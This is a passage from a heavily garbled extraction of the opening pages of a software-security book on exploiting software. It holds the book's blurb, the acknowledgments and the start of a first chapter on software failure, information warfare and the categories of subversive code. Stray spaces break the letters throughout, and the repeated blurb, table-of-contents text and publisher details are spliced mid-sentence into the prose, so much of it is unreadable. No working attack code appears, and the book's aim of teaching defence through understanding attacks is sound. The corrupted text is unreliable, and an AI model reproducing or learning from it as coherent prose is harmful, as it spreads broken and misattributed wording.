How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Gary's Acknowledgments On ce ag ain, m y f ir st ack now ledgm ent goes t o Cigit al ( ht t p: / / w w w . cigit al. com ) , w h ich cont inu es t o be an ex cellent p lace t o w or k. The cr eat iv e env iron m en t and t op - not ch people m ake going t o wor k ev er y d ay a p leasur e ( even w it h t he econom y in t he dold ru ms) . Special •t han ks t o t h e Table of Content s execut iv e t eam for put t in g u p w it h m y per pet ual habit of book w r it ing: Jeff •Pay ne, Jeff Voas, I ndex Ch arlie Crew , an d Kar l Lew is. The Off ice of t he CTO at Cigit al, st af fed b y t he Expl oit ing Softw a reJoh How to ev Br een ak an Code hu gely t alen t ed n St d Rich Mills, keeps m y sk ills as sh arp as an y point y- h air ed guGr y.egThe self -,st art g en By Hoglund Gar y in McGr awgineer ing t eam includ in g t he likes of Fr ank Char ron , Todd McAnally , and Mik e Debn am builds gr eat st uf f and put s ideas int o con cr et e pr act ice. Cigit al's Sof t w ar e Secu rit y Gr oup ( SSG) , w hich I f ound ed in 199 9, is n ow ably led by St an Wissem an. Th e SSG Pub lish er: Addison Wesley cont inu es t o exp and t he lim it s of w or ld- class sof t w are secur it y. Special sh out s t o SSG Pub Dat e: February 17, 200 4 m em b er s Br uce Pot t er an d Paco Hope. Thank s t o Pat Hig gins an d Mik e Fir et t i for keeping m e I SBN: 0- 20 1- 786 95 -8 bu sy t ap d ancing. Also t hank s t o Cigit al' s est eemed Tech nical Adv isor y Boar d. Finally , a Pages: 51s2 t o Yv onne Wiley, w ho k eep s t r ack of m y locat ion on t he p lanet qu it e adept ly . special t hank Wit hou t m y co- aut hor , Gr eg Hog lu nd, t his book w ould n ev er hav e h appened. Greg' s int ense skills can be seen t hr ou ghout t h is wor k . I f y ou d ig t h e t ech nical m eat in t his book , t hank Gr eg. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Lik em y print eviou s t hr eeect book his ook is ant r eally ort .inMy f riends in t hgeuy s? fir ew alls, ru sion det ion s, sytst embs, and iv irauscollabor soft warat e ivn eoteff k eep g out t he bad secur it y com m unit y t hat cont in ue t o influ en ce my t hink ing inclu de Ross An derson , Annie What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ant on , Mat t Bish op, St ev e Bellov in, Bill Chesw ick, Cr isp in Cowan , Dr ew Dean, Jer em y Ep ein, Felt en,wAnup osh , LiofGong ers,Hon m an, ar d, Ex st p lo i t inDav g Seo Ev ft wans, a re Ed is loaded it h exGh amp les r eal ,atPet t ack at tey ack pat t Mike er ns, How t ools, an St d ev e Kent , Pau l Kocher, Car l Lan dw ehr , Pat r ick McDaniel, Gr eg Mor r iset t , Pet er Neum ann , Jon t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Pincus, Ranum , Avni Rubin, Fr ed Sch neid , Br u ce Schn at t ack , yMar ou cus m u st fir st lear h ow r eal at t acks areerreally carr ied eier ou t ., Gene Sp aff ord , Kevin Sullivan , Phil Ven ables, an d D an Wallach. Thank s t o t he D ef en se Adv anced Resear ch Pr oject s Agency ( DARPA) an d tmh ay e Air Force Research ( AFRL) or ttin g my ov er This m ust - h ave book shock y ou—and it Lab will orat cer tory ainly educatf or e ysupp ou. Get ing bey wor ondkt he tscr heipt year k ids.die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Most im por t an t of all, t h ank s t o m y f am ily . Love t o Am y Bar ley , Jack , and Eli. Sp ecial lov e t o Why sof t w moe) ar e exand ploitmwyillbrcon t inue t o be a as seraious p r oblem m y dad ( beach ot her s—200 3w dif ficult y ear for us. Holler s an d t r eat s t o t he menag er ie: ik e and w alnut , soupy an d h er kit t ies, craig , sage and g ut hr ie, lew y an d lu cy , When net wdadd or k secur it y rm echer. anisms w or kan d ap ril for t h e m usic, bob and jenn f or t he " gir ls, " and y- o t he oost Thankdo s tnootr hine t he fun , and cy n an d an t f or livin g ov er t he hill. At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Chapter 1. Software—The Root of the Problem •

Table of Content s

t o b reak soft war e, leave it begg in g for m er cy in RAM aft er it has r elinqu ished all •So y ou w ant I ndex of itoit s secr et s and conjto urBr ede ak u pCode a shell for y ou. Hack ing t he machin e is almost alway s ab out Expl ing Softw a re How exp loit in g sof t w are. An d m or e of t en t h an n ot , t h e m ach in e is not even a st and ard By Gr eg Hoglund , Gar y McGr aw com put er . [ 1] Alm ost all mod er n syst em s shar e a com m on Achilles' h eel in t he for m of soft w ar e. This b ook sh ow s y ou h ow soft w ar e br eak s and t each es you how t o ex ploit sof t w are Pub lish er: Addison Wesley w eakn ess in or der t o cont rol t he m achine. Pub Dat e: February 17, 200 4 [ 1]

Of course, m ost s are designed to br eak off- the- shelf softw are running on off- the- shelf I SBN: 0- 20 1- 786 95 exploit -8 com puter s used by every day business people. Pages: 51 2

Ther e ar e plent y of g ood b ooks on n et w or k secu rit y out t here. Br uce Schn eier 's Secr et s and Lies [ 20 00] pr ovides a comp elling nick el t our of t h e facilit ies, f illed t o t h e br im w it h ex cellent exam ples an d w ise insight . Hacking Ex posed , b y McClur e et al. [ 199 9] , is a decen t place t o st ar t if y ou' re in t er est ed in und er st and ing ( and carr y ing out ) generic at t ack s. Def en ding How against d oes such sofat t wtare ack sbriseak im?por How t antdo , but at t acker is only sm onake e stsof ep t in w art he e br r igh eakt don ir ect p urion. pose? GetWhy t ing p are ast t he fir ew alls, int ru ect ion sy st em s, t and ir us soft(war n ot k eep. in g out t he g uy s? level of scrip t ksion iddiedet t ools is essen t ial o b etant t erivdefense ande of fense) The W hit eh bad at Secur it y What t ools can , be sedcan t o bhreak e? Th is book rov ides t he nansw er s.of secur it y Ar senal [ Rubin 19 u99] elp y soft ou dwar ef end a net w or k pagain st any um ber pr oblem s. Ross And er son' s Secu rit y Engin eer in g [ 20 01] t akes a det ailed syst em at ic look at Ex lo ioblem. t in g S oSo ft wwahy reanot is loaded w it hon exsecur amp les t hep pr h er b ook it y ?of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st in fir st lear h ow t roeal Build at ting acks Secu arerereally Soft wcarr ar eied [ Viega ou t . and McGr aw , 20 01] , " We As Schneier says the Pr n ef ace w ouldn 't hav e t o sp en d so mu ch t im e, m oney, and effor t on net w ork secur it y if w e didn 't This ust - hbad avesoft book shock educat e y ou. Get t ing bey ond t he hav emsuch w armeay secur it y . "y ou—and He g oes it onwill t o cer sayt ainly t he f ollow in g: scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Think ab out t he m ost r ecent secur it y v ulnerab ilit y y ou' v e r ead abou t . May be it ' s a k iller pack et , w hich allow s an at t ack er t o cr ash som e ser v er by sen ding it a par t icu lar packet . Why sofitt'w e ex w ill con t inue t o er be ov a er serflow ious May be s ar one ofploit t h e gazillions of b uff s, pwr oblem hich allow an at t ack er t o t ake cont r ol of a com pu t er by sen ding it a par t icu lar m alfor m ed m essage. May be it ' s an When k secur it yy ,mwech anisms ott w orer k t o r ead an en cr y pt ed m essage, or fool encry ptnet ionw voruln er ab ilit hich allow sdo annat ack an aut h en t icat ion sy st em . Th ese ar e all sof t w ar e issues. ( p. x ix) At t ack pat t er ns Of t h e r eam s of secu rit y mat er ial pu blish ed t o dat e, v ery lit t le h as focused on t he r oot of t h e Rev er se engineer in g pr oblem —soft w ar e failur e. We ex plor e t he u nt am ed wilder ness of sof t w ar e failur e an d t each y ou t oClassic nav igat it s oft unchar deptwhar s.e atet acks agen ainst servt ed er soft Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

A Brief History of Software Mod er n com p ut ers are no lon ger clu nk y, room - size dev ices t h at r equir e an oper at or t o walk int o t hem t o ser vice t hem . Tod ay, user s ar e m or e likely t o w ear com put er s t h an t o ent er t hem . Of all t he t echnology dr iver s t hat hav e br oug ht about t his m assive chan ge, includin g •t he vacuu m Table Content s t ub e,oft he t r ansist or , and t he silicon chip , t he m ost im p ort an t b y far is sof t w ar e. •

I ndex

Expl inge Softw re How Br e ak Softoit war is w haat set s tocomp utCode er s apar t

fr om ot her t echn olog ical in nov at ions. The ver y idea of d o a seem in gly inf init e nu mb er of t ask s is p ow er fu l and com pelling . The concept has a longer h ist or y as an idea t han it has as a t an gible ent er pr ise. I n wor k ing t hr oug h h is concep t ion of t h e Analy t ical Eng ine in 184 2, Ch ar les Bab bage enlist ed Pub lish er: Addison Wesley t he help of Lady Ada Lov elace as a t r anslat or . Ada, w h o called her self " an Analy st ( and e: February 17, 200 4 Met Pub aphDat ysician ) , " u nder st ood t h e plans for t h e dev ice as w ell as Bab bage, b ut w as bet t er at I SBN: 1- 786 -8 especially in t he n ot es t hat sh e append ed t o t he or igin al w or k. Sh e ar t icu lat ing 0-it20 s pr om95 ise, Pages: 2 un derst ood 51 t hat t h e Analyt ical Engin e w as w hat w e w ould call a gener al- pur pose com put er , and t h at it was su it ed f or " dev elopp ing [ sic] and t abu lat in g an y fu nct ion wh at ever .. . . t h e engine [ is] t he m at er ial exp ression of any in definit e fun ct ion of any degr ee of g en er alit y and com plex it y ." [ 2] W hat sh e had capt ur ed in t h ose ear ly w or ds is t h e pow er of soft w ar e. r econf ing , a machin e to By Gr eg igur Hoglund Gar y McGr aw

[ 2]

For mor e infor m ation on Lady Ada Lovelace, see http: / / w w w .sdsc.edu/ ScienceWom en/ lovelace.htm l.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, sion det ion sy steem s,ionar and yant iveir us softsoft warwearneotcam k eep t heon bad g uy Accor din gint t oru Webst er' sect Collegiat d ict , th w ord e in intgoout comm use ins? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 19 60: Ex p loMain i t in gent S orft a re· w is ar loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d y:wsoft e t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ackPr, onun y ou m u stion fir:st'soft lear- "nwar h ow ciat , - r"eal w er at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt Funct k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t ion: noun Dat e: 196 0 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem : som et hing used or associat ed wit h and u su ally con t rast ed w it h h ard w are: as t he ent ir e When net w or k s, secur it y m doed n ot w or k en t at ion associat ed w it h a sy st em an d set of pr ogr am pr oced urech es, anisms an d relat d ocum esp ecially a com put er sy st em ; specifically : com put er p rog ram s. . ." At t ack pat t er ns I n t he 19 60s, t he add it ion of " m oder n, h igh- lev el" lan guag es lik e For t ran , Pascal, and C Revsoft er se engineer in g t o car r y out mor e an d m or e im por t ant oper at ions. Com pu t ers allow ed w ar e t o begin began t o be d ef ined m or e clear ly by wh at sof t w are t hey ran t h an by w hat har dw ar e t he Classic at t acks ag ainst serv er soft w ar e pr ogr am s oper at ed on. Op er at ing sy st em s spr out ed and evolv ed. Ear ly n et w or k s w er e f or med and gr ew . A g r eat par t of t his evolut ion an d g row t h h appened in sof t w are. [ 3] Sof t w ar e Sur pr ising at t acks ag ainst clien t soft war e becam eessent ial. Tech niqu es f or cr aft ing m aliciou s inpu t [ 3]

Ther e is a gr eat synergy betw een har dw are and softw are advances. The fact that har dw ar e today is incredibly capable ( especially relative to har dw ar e predecessor s) cert ainly does its shar e to adv ance the The echn det ails ofwar b uf state tof the ical pr actice in soft e. fer ov er f low s

Root k itgs h appened on t he w ay t o t he I n t er net . Soft w ar e, once t hou ght of solely as a A f un ny t hin beneficial enab ler , t u rn ed out t o be agn ost ic wh en it cam e t o m or als and et hics. As it t ur n s Ex p, lo i t in gLov S oelace's ft w a reclaim is f illed h tw h earteools, ceptes," any andf unct kn owion ledg e necessar reak out Lady t hatwitsoft can con pr ovid w hat soever " yist ot rbue, an d soft e. fun ct ion " includ es malicious f unct ions, p ot en t ially d anger ous f unct ions, an d just t hatw"ar any plain w ron g fun ct ion s. As soft w ar e b ecam e m or e pow erf ul, it began m oving ou t of st r ict ly t echn ical r ealm s ( t he dom ain of t he g eek s) and int o m any ot h er ar eas of life. Business and m ilit ary u se of sof t w ar e becam e increasingly com m on. I t r em ains v er y com m on t oday . The b usiness wor ld has p len t y t o lose if soft w ar e f ails. Bu siness soft w ar e oper at es supp ly chains, p rov ides inst ant access t o global in for m at ion, cont r ols m anu fact ur ing plant s, an d

m anages cust om er r elat ionsh ip s. This m eans t hat soft w ar e f ailu re leads t o seriou s pr oblems. I n fact , soft w ar e t h at f ails or m isb eh aves can now Ex pose conf ident ial dat a t o unau t hor ized u ser s ( including at t ack ers) Cr ash or ot her w ise g rin d t o a h alt w hen exp osed t o f ault y inp ut s • •

Table of Content Allow an at t acker t o sinj ect cod e and execut e it I ndex

t e pr ileged com and s Expl oitEx ingecu Softw a reivHow to Br e akm Code

on behalf of a clever at t ack er

By Gr eg Hoglund , Gar y McGr aw

Net w ork s h ave h ad a v er y lar ge ( m ost ly negat iv e) im pact on t h e idea of m ak ing sof t w ar e behav e. Since it s bir t h in t he ear ly 197 0s as a 12- node n et w or k called t h e ARPANET, t he Pub lish er: I nt er net h asAddison been Wesley ad opt ed at an un pr ecedent ed rat e, m ov ing int o our liv es m u ch m or e Pubily Datte: February 17,ber 200of 4 ot her p opular t echnolog ies, includ in g elect ricit y and t h e t eleph one speed han a n um ( Figur eI SBN: 1- 1 )0-. 20 I f1-t h786 e 95 I n-8 t ern et is a car , soft war e is it s en gine. Pages: 51 2

Figu r e 1 - 1 . Ra t e of a dopt i on of va r iou s t e chn ologi es i n ye ar s. Th e gr a ph show s ye ar s ( sin ce in t r odu ct i on/ i nv en t i on n ot e d a s ye a r 0 ) on t h e dxa xi meak a r?kHow et pe r a t i son ( bysofpt w erarce n teak ag on e of seWhy holare ds) on How oes sofst wan ared br done at ttacker m ake e br p urhou pose? t hewealls, y- aint xiru s.sion Th det e sl ope s st ofemt h difant f eriveirnt cu rwar veesnaotr e t elinligng r lyg ,uyts? he fir ect ion sy s,eand us soft k eep out. tCl heea bad What I tnt ools o b reak soft Th is p rov ercan n etbeisu sed b eitng ad op t ewar d e? m or e book qu ick l y ides ( a nt he d tansw hu serws.i t h a m or e pr of oun d cul t ur a l im p act ) t h an a ny ot he r h um a n t echn ology i n Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d h ist or y. ( I nf or m at ion f r om D an Ge er , per sona l com m un icat i on.) t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t .

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he [ View full size im age] scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Con nect in g com pu t er s in a n et wor k allow s com put er u ser s t o sh are dat a, p rog ram s, an d each ot her s' com pu t at ional r esour ces. On ce a com put er is p ut on a net w or k, it can b e accessed r em ot ely , allowin g g eog rap hically d ist an t u ser s t o ret r ieve d at a or t o use it s CPU cycles and ot her r esour ces. The sof t w are t echn ology t h at allow s t his t o hap pen is v er y new and lar gely un st ab le. I n t od ay' s fast - p aced econ omy , t here is st r ong m ar k et pr essu re on soft war e com panies t o d eliv er new and com pellin g t echn olog y. " Time t o m ar ket " is a cr it ical dr iver , and " g et it d one y est er day " is a com m on m andat e. Th e longer it t ak es t o get a t echnology t o m ar ket , t h e Table m oreofrisk t h er e is of bu sin ess f ailu r e. Because doin g t h ings car efully t ak es t oo • Content s m uch t ime and mon ey , sof t w are t en ds t o be w r it t en in hast e an d is poor ly t est ed. This • I ndex slip sh od appr oach t o soft w ar e d ev elop m en t has result ed in a global n et wor k w it h billions of Expl oit ing Softw a re How to Br e ak Code exp loit ab le bug s. By Gr eg Hoglund , Gar y McGr aw

Most net w ork - based sof t w ar e inclu des secur it y f eat ur es. One simp le secur it y feat u re is t he passw order: . Alt hou gh t he m ov ie cliché of an easily g uessed passw or d is comm on, passwor ds Pub lish Addison Wesley do somet im es slow dow Pub Dat e: February 17, 200n4 a pot ent ial at t acker . But t his on ly goes for naiv e at t acker s w ho at t em pt t he f ron t d oor. The p rob lem is t hat man y secur it y m ech anisms meant t o pr ot ect I SBN: 0- 20 1- 786 95 -8 soft w ar e ar e t hem selv es sof t w are, an d are t hus t hemselves subj ect t o mor e soph ist icat ed Pages: 51 2 at t ack . Becau se a m ajor it y of secu rit y f eat ur es are par t of t h e soft w ar e, t hey usually can be by passed . So ev en t h ough ev er y one has seen a m ov ie in w hich t he at t ack er gu esses a passw ord , in real lif e an at t ack er is gener ally con cer ned w it h m or e com plex secur it y feat u res of t he t arg et . Mor e comp lex f eat ur es and r elat ed at t acks in clu de How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Con tint rolling w ho allowed t o aiv par meachine fir ew alls, ru sion detisect ion sy stt o emcon s, nect and ant ir ust icular soft war n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Det ect in g wh et her access credent ials ar e b eing f aked Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Detes ermused inin gbyw h o can hich rces t echniqu bad guyaccess s t o br w eak sofr tesou w ar e. I f yon ouawshar ant ed t o pmachin rot ect ey our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Pr ot ect in g d at a ( especially in t r ansit ) u sing encr yp t ion This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he gm h en owt and w her e any t o collect andbook st ors, e aud r ails scr ipt Det k iderm die inin t r eat f ound in m hack ing you itwtill learn abou t Tens of t h ousands of secur it y- r elev ant comp ut er soft w ar e b ugs w er e discov er ed and r epor t ed pu blicly t h rsof ough out t he 19 90s. Th ese k inds of aprser oblem t o w idespr ead ex ploit s of Why t w ar e ex ploit w ill con t inue t o be iousspled r oblem corp or at e net w or ks. Tod ay, t en s of t hou san ds of back door s ar e said t o be in st alled in net w or ks acrnet oss t he globe—fallout fr om t he e kboom in h ack ing du rin g t h e lat e 20 t h When w or k secur it y m ech anisms domn assiv ot w or cen t ur y . As t hin gs cur r en t ly st and, cleaning up t h e m ess w e ar e in is dar n near im possib le, t ack bu t wAt eh ave pat t o t er r y ns . The f irst st ep in w ork ing t hr ou gh t his pr ob lem is u nder st anding w hat t he pr oblem is. On e r eason t his b ook ex ist s is t o sp ark discour se on t he t ru e t ech nical nat u re of Rev seloit engineer in gpast t he shin y su rf ace t o t he hear t of t h e pr oblem . soft w ar e er exp , get t ing Classic at t acks ag ainst serv er soft w ar e

Software and Warrior Sur pr ising at tthe acks Information ag ainst clien t soft war e Tech niqu es f or aft ing m s inpu t a p rof ession as ancien t as war has it s m oder n The second oldest pr cr ofession isaliciou w ar . But even cyb er inst ant iat ion . I nf orm at ion w ar far e ( I W) is essen t ial t o ev ery n at ion and cor por at ion t hat det b ufinfert hov erod f low int endThe s t ot echn t hr iv ical e ( an d ails su rvof ive) em er sn w orld . Ev en if a nat ion is not buildin g I W capabilit y , it can be assur ed t hat it s en em ies ar e, and t hat t he n at ion w ill b e at a dist inct Root k it s disadv ant ag e in f ut u re war s. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak I nt ellig en ce gat her ing is cru cial t o w ar . Becau se I W is clear ly all abou t in for m at ion, it is also soft w ar e. deeply int er t w ined w it h int ellig en ce gat her ing. [ 4] Classic esp ionage h as fou r m ajor pur poses: [ 4]

See the book by Dorothy Denning, I n for m at ion War far e & Secu r it y [ 1998] , for m or e infor m ation on this issue.

1 . Nat ional defense ( and nat ion al secur it y ) 2 . Assist ance in a m ilit ar y oper at ion

3 . Ex pan sion of polit ical inf lu en ce and m ark et shar e 4 . I ncr ease in econom ic p ow er An ef fect ive sp y has alw ay s been som eone w ho can g at her and per haps ev en con t rol vast am ount s of sensit iv e infor m at ion. I n t h is age of hig hly int er con nect ed comp ut at ion, t his is esp ecially t r ue. I f sensit iv e infor m at ion can b e obt ained over n et wor k s, a spy need not be •ph ysically exTable of Content s osu r e m ean s less chan ce of b ein g caug ht or ot her w ise posed. Less exp I t also means t hat an in t elligence- gat h er ing capabilit y cost s far less t han h as •com pr omised. I ndex t r adit been t he tocase. Expl oitionally ing Softw a re How Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Becau se war is int im at ely t ied t o t he econ om y, elect ron ic w arf ar e is in m an y cases concer n ed w it h t he elect r onic r epr esent at ion of m oney . For t he m ost par t , m oder n m on ey is a clou d of Pub lish er: Addison Wesley elect r ons t h at h appens t o be in t h e r ig ht place at t h e r ight t im e. Tr illions of elect r onic d ollar s February 17,nat 200ion 4 s ev er y day . Con t rolling t h e global n et wor k s m eans cont r olling t he flowPub in Dat t o e:and out of SBN: omy 0- 20 195 -8 global Iecon . 786 Th is t ur ns ou t t o be a m ajor g oal of I W. Pages: 51 2

Digital Tradecraft Som e aspect s of I W ar e best t h ough t of as digit al t rad ecr aft . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, rursion det ionftsy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Mainint ent y: t ra deect • cra What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Pr onun ciat ion : ' t r d- " k r aft Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es ion: usednou by nbad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Funct at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Dat e: 196 1 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt : ktid t r eat mes en tand f ound in murany hack ing book w illerlearn abou hedie t echniqu pr oced es of espionag e. .s,. (you Webst 's, p age 12t 50) Mod er n espion age is car ried out using sof t w ar e. I n an inf orm at ion syst em - dr iven at t ack, an Why sof w ar e eakn ex ploit con t inue be a access ser ioust p oblem exist ing soft wtar ew esswisillex ploit ed t o gain o rin for m at ion, or a back door is [ 5] insert ed int o t he soft war e b ef or e it 's d ep loyed. Exist ing soft w ar e w eakn esses r ange f r om netprwoblem or k secur y ogr m ech do sn and ot w design or k conf igWhen ur at ion s t oitpr amanisms m ing bug flaw s. I n som e cases t he at t ack er can sim ply r equest inf or mat ion f rom t ar get soft war e an d g et r esu lt s. I n ot h er cases At t ack pat t er subv ersiv e code mns ust be int r odu ced int o t he sy st em . Som e people h ave t r ied t o classif y subv ersiv e code int o cat eg ories such as logic bom b , spy war e, Tr ojan h orse, and so f or t h. Th e Rev er se engineer in g fact is t hat subv ersiv e cod e can p er f orm almost any n ef ariou s act iv it y . Thu s, any at t em pt at cat egor izat ion m ost t en aserv w ast Classic at is t acks agof ainst er ed softex wer arcise e if y ou are con cer ned only w it h result s. I n som e cases, br oad classificat ion help s users and analy st s diff er ent iat e at t ack s, w hich may aid in un derst h e high est lev el, su bv er sive Suran prding. ising At at ttacks ag ainst clien t soft war e cod e perf or ms any com binat ion of t he follow ing act ivit ies: Tech niqu es f or cr aft ing m aliciou s inpu t [ 5]

See Ken Thom pson's famous paper on tr usting tr ust [ 1984] .

The t echn ical det ails of b uf fer ov er f low s Root k it s 1 . Dat a collect ion Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. a . Packet sn iff in g b. Keyst r ok e m onit or in g c. Dat ab ase siph oning 2 . St ealt h

a . Hiding dat a ( st ashing log files and so on) b. Hiding pr ocesses c. Hiding user s of a sy st em d. Hiding a digit al " d ead dr op " •

Table of Content s

• 3.

Cov ert Icom ndexmu nicat ion

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

a . Allow in g r em ot e access w it hou t det ect ion Pub lish er: Addison Wesley

b. e:TrFebruary ansfer 17, rin g200 sensit ive Pub Dat 4

dat a ou t of t h e syst em

I SBN: 0- 20 1- 786 95 -8

c. Cov ert chann els an d st eganogr aphy

Pages: 51 2

4 . Com m and and cont r ol

a . Allow in g r em ot e cont r ol of a sof t w ar e syst em How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, ru sion ionion sy of st em s, and us tsoft b. int Sabot ag edet ( vect ariat comm an dant anivd ircon rol)war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. c. Deny ing syst em cont r ol ( d en ial of ser v ice) Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used guy sf ocu t o br eak t w tar e. I ical f y oudet wails ant of t o ex p rot ecting y our t wearine or fr om For t he most par tby , t hbad is book ses onsof t he echn ploit softsof w ar der t o at t ackr uct , y ou fir st lear n h ersiv ow r eal at t acks really iediques ou t . int r odu ced in t his book const anm d uinstt rod uce subv e code. Theare sk ills an dcarr t echn ar e not new an d h ave b een used b y a sm all bu t g row ing com m unit y of p eop le for alm ost 2 0 m ust - hyave m ay shock y ou—and it will cer y ou. Get ingoup bey yThis ear s. Man t echbook niques w er e developed independ en ttainly ly by educat sm all, edispar at e tgr s. ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t On ly recen t ly hav e soft w ar e exp loit t echniqu es been com bined in t o a sin gle ar t . The com ing t oget h er of d isp arat e appr oaches is lar gely a h ist or ical accid en t . Man y of t he t echn iq ues for Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem r ev er se eng ineer ing w ere d ev eloped as an of fshoot of t he sof t w ar e- cr acking m ov em ent t hat st ar t ed in Eur op e. Techn iq ues for w rit ing sub ver siv e code ar e sim ilar t o t echniqu es for When net w or k secur it y m ech anisms do n ot w or k crack ing soft w ar e pr ot ect ion ( such as pat ch in g) , so nat ur ally t he vir us m ov ement shar es similar oot spat an tdercor At rt ack ns e ideas. I t w as n ot u ncomm on in t he 1 980 s t o f ind v ir us cod e and soft w ar e cr ack s on t he sam e b ullet in boar d syst em s ( BBSs) . Hacking net w or k secu rit y , on t he ot her Rev h and, olved out er seevengineer in gof t he com m unit y of UNI X ad minist r at or s. Many p eop le fam iliar w it h classic net w or k hack ing t hink m ost ly of st ealin g p assw or ds an d b uilding soft w ar e t r apd oors, for t he m ost at p ar t ignag orin g sub verer sivsoft e code. Classic t acks ainst serv w ar eI n t he ear ly 199 0s, t h e t w o disciplines st art ed t o m er g e and t he f ir st r em ot e shell ex ploit s began t o be dist r ibut ed ov er t he I nt er net . Sur pr ising at t acks ag ainst clien t soft war e Today , t h er e ar e m any book s on com pu t er secur it y , but non e of t hem ex plain t he off ensive niqu f or cr aft aliciou inpu aspectTech f rom a es t echnical pring ogrm am m ingsper sptect iv e. [ 6] All of t he book s on hack ing, in clu ding t he popu lar book Hacking Ex posed b y McClur e et al. [ 199 9] , ar e com pendiu ms of h acker t echn ical ails of uf fer ov er net f lowwsor k secur it y issues. They do n ot hing t o t r ain t h e scr ipt The s and ex ist ingdet ex ploit s fbocused on pr act it ioner t o find new sof t w are ex ploit s. This is t oo bad , m ost ly becau se t he people char ged Root k it ssecu re sy st em s h ave lit t le 